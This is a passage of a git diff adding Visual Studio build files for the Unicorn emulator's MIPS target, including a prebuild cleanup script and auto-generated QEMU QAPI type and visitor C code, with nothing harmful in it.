Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" 
Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 
%(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mipsel.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mipsel.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mipsel.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mipsel.h</ForcedIncludeFiles> + 
<DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj.filters new file mode 100644 index 0000000..3ec346f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj.filters @@ -0,0 +1,128 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{00b0caab-f50f-47a1-99ea-a452f1e712e3}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{f666e049-ed32-4817-9998-b6898ce2b71a}</UniqueIdentifier> + </Filter> + <Filter Include="hw\mips"> + <UniqueIdentifier>{b2a1fb8b-789a-45a6-a814-9312ad75bd70}</UniqueIdentifier> + </Filter> + <Filter Include="target-mips"> + <UniqueIdentifier>{e6bea1c8-7307-44c8-9956-25321f73287f}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{cce3d221-0ae7-4cea-a9bd-5fe10a932c20}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{9b5981d1-89fd-4210-ac4d-7b3dab34871b}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + 
<Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\mipsel.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c"> + <Filter>hw\mips</Filter> + 
</ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/prebuild_script.bat b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/prebuild_script.bat new file mode 100644 index 0000000..417682a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/prebuild_script.bat @@ -0,0 +1,21 @@ +del ..\..\qemu\qapi-types.h 2> null +del ..\..\qemu\qapi-types.c 2> null + +del ..\..\qemu\qapi-visit.h 2> null +del ..\..\qemu\qapi-visit.c 2> null + +del ..\..\qemu\config-host.h 2> null + +del 
..\..\qemu\aarch-softmmu\config-target.h 2> null +del ..\..\qemu\aarcheb-softmmu\config-target.h 2> null +del ..\..\qemu\arm-softmmu\config-target.h 2> null +del ..\..\qemu\armeb-softmmu\config-target.h 2> null +del ..\..\qemu\m68k-softmmu\config-target.h 2> null +del ..\..\qemu\mips64el-softmmu\config-target.h 2> null +del ..\..\qemu\mips64-softmmu\config-target.h 2> null +del ..\..\qemu\mipsel-softmmu\config-target.h 2> null +del ..\..\qemu\mips-softmmu\config-target.h 2> null +del ..\..\qemu\sparc64-softmmu\config-target.h 2> null +del ..\..\qemu\sparc-softmmu\config-target.h 2> null +del ..\..\qemu\x86_64-softmmu\config-target.h 2> null +del null diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.c b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.c new file mode 100644 index 0000000..173c654 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.c @@ -0,0 +1,293 @@ +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * deallocation functions for schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * Michael Roth <mdroth@linux.vnet.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#include "qapi/dealloc-visitor.h" +#include "qapi-types.h" +#include "qapi-visit.h" + +const char *ErrorClass_lookup[] = { + "GenericError", + "CommandNotFound", + "DeviceEncrypted", + "DeviceNotActive", + "DeviceNotFound", + "KVMMissingCap", + NULL, +}; + +const char *X86CPURegister32_lookup[] = { + "EAX", + "EBX", + "ECX", + "EDX", + "ESP", + "EBP", + "ESI", + "EDI", + NULL, +}; + + +#ifndef QAPI_TYPES_BUILTIN_CLEANUP_DEF_H +#define QAPI_TYPES_BUILTIN_CLEANUP_DEF_H + + +void qapi_free_strList(strList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_strList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_intList(intList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_intList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_numberList(numberList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_numberList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_boolList(boolList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_boolList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int8List(int8List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int8List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int16List(int16List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v 
= qapi_dealloc_get_visitor(md); + visit_type_int16List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int32List(int32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int64List(int64List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int64List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint8List(uint8List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint8List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint16List(uint16List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint16List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint32List(uint32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint64List(uint64List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint64List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +#endif /* QAPI_TYPES_BUILTIN_CLEANUP_DEF_H */ + + +void qapi_free_ErrorClassList(ErrorClassList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = 
qapi_dealloc_get_visitor(md); + visit_type_ErrorClassList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPURegister32List(X86CPURegister32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPURegister32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPUFeatureWordInfoList(X86CPUFeatureWordInfoList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPUFeatureWordInfoList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPUFeatureWordInfo(X86CPUFeatureWordInfo *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPUFeatureWordInfo(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.h new file mode 100644 index 0000000..944e882 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-types.h @@ -0,0 +1,228 @@ +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#ifndef QAPI_TYPES_H +#define QAPI_TYPES_H + +#include "unicorn/platform.h" + + +#ifndef QAPI_TYPES_BUILTIN_STRUCT_DECL_H +#define QAPI_TYPES_BUILTIN_STRUCT_DECL_H + + +typedef struct strList +{ + union { + char *value; + uint64_t padding; + }; + struct strList *next; +} strList; + +typedef struct intList +{ + union { + int64_t value; + uint64_t padding; + }; + struct intList *next; +} intList; + +typedef struct numberList +{ + union { + double value; + uint64_t padding; + }; + struct numberList *next; +} numberList; + +typedef struct boolList +{ + union { + bool value; + uint64_t padding; + }; + struct boolList *next; +} boolList; + +typedef struct int8List +{ + union { + int8_t value; + uint64_t padding; + }; + struct int8List *next; +} int8List; + +typedef struct int16List +{ + union { + int16_t value; + uint64_t padding; + }; + struct int16List *next; +} int16List; + +typedef struct int32List +{ + union { + int32_t value; + uint64_t padding; + }; + struct int32List *next; +} int32List; + +typedef struct int64List +{ + union { + int64_t value; + uint64_t padding; + }; + struct int64List *next; +} int64List; + +typedef struct uint8List +{ + union { + uint8_t value; + uint64_t padding; + }; + struct uint8List *next; +} uint8List; + +typedef struct uint16List +{ + union { + uint16_t value; + uint64_t padding; + }; + struct uint16List *next; +} uint16List; + +typedef struct uint32List +{ + union { + uint32_t value; + uint64_t padding; + }; + struct uint32List *next; +} uint32List; + +typedef struct uint64List +{ + union { + uint64_t value; + uint64_t padding; + }; + struct uint64List *next; +} uint64List; + +#endif /* QAPI_TYPES_BUILTIN_STRUCT_DECL_H */ + + +extern const char *ErrorClass_lookup[]; +typedef enum ErrorClass +{ + ERROR_CLASS_GENERIC_ERROR = 0, + ERROR_CLASS_COMMAND_NOT_FOUND = 1, + ERROR_CLASS_DEVICE_ENCRYPTED = 2, + ERROR_CLASS_DEVICE_NOT_ACTIVE = 3, + ERROR_CLASS_DEVICE_NOT_FOUND = 4, + ERROR_CLASS_KVM_MISSING_CAP = 5, + ERROR_CLASS_MAX = 
6, +} ErrorClass; + +typedef struct ErrorClassList +{ + union { + ErrorClass value; + uint64_t padding; + }; + struct ErrorClassList *next; +} ErrorClassList; + +extern const char *X86CPURegister32_lookup[]; +typedef enum X86CPURegister32 +{ + X86_CPU_REGISTER32_EAX = 0, + X86_CPU_REGISTER32_EBX = 1, + X86_CPU_REGISTER32_ECX = 2, + X86_CPU_REGISTER32_EDX = 3, + X86_CPU_REGISTER32_ESP = 4, + X86_CPU_REGISTER32_EBP = 5, + X86_CPU_REGISTER32_ESI = 6, + X86_CPU_REGISTER32_EDI = 7, + X86_CPU_REGISTER32_MAX = 8, +} X86CPURegister32; + +typedef struct X86CPURegister32List +{ + union { + X86CPURegister32 value; + uint64_t padding; + }; + struct X86CPURegister32List *next; +} X86CPURegister32List; + + +typedef struct X86CPUFeatureWordInfo X86CPUFeatureWordInfo; + +typedef struct X86CPUFeatureWordInfoList +{ + union { + X86CPUFeatureWordInfo *value; + uint64_t padding; + }; + struct X86CPUFeatureWordInfoList *next; +} X86CPUFeatureWordInfoList; + +#ifndef QAPI_TYPES_BUILTIN_CLEANUP_DECL_H +#define QAPI_TYPES_BUILTIN_CLEANUP_DECL_H + +void qapi_free_strList(strList *obj); +void qapi_free_intList(intList *obj); +void qapi_free_numberList(numberList *obj); +void qapi_free_boolList(boolList *obj); +void qapi_free_int8List(int8List *obj); +void qapi_free_int16List(int16List *obj); +void qapi_free_int32List(int32List *obj); +void qapi_free_int64List(int64List *obj); +void qapi_free_uint8List(uint8List *obj); +void qapi_free_uint16List(uint16List *obj); +void qapi_free_uint32List(uint32List *obj); +void qapi_free_uint64List(uint64List *obj); + +#endif /* QAPI_TYPES_BUILTIN_CLEANUP_DECL_H */ + + +void qapi_free_ErrorClassList(ErrorClassList *obj); + +void qapi_free_X86CPURegister32List(X86CPURegister32List *obj); + +struct X86CPUFeatureWordInfo +{ + int64_t cpuid_input_eax; + bool has_cpuid_input_ecx; + int64_t cpuid_input_ecx; + X86CPURegister32 cpuid_register; + int64_t features; +}; + +void qapi_free_X86CPUFeatureWordInfoList(X86CPUFeatureWordInfoList *obj); +void 
qapi_free_X86CPUFeatureWordInfo(X86CPUFeatureWordInfo *obj); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.c b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.c new file mode 100644 index 0000000..7733bb5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.c @@ -0,0 +1,428 @@ +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qemu-common.h" +#include "qapi-visit.h" + +void visit_type_strList(Visitor *m, strList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + strList *native_i = (strList *)i; + visit_type_str(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_intList(Visitor *m, intList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + intList *native_i = (intList *)i; + visit_type_int(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_numberList(Visitor *m, numberList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + 
} + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + numberList *native_i = (numberList *)i; + visit_type_number(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_boolList(Visitor *m, boolList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + boolList *native_i = (boolList *)i; + visit_type_bool(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int8List(Visitor *m, int8List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int8List *native_i = (int8List *)i; + visit_type_int8(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int16List(Visitor *m, int16List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int16List *native_i = (int16List *)i; + visit_type_int16(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int32List(Visitor *m, int32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + 
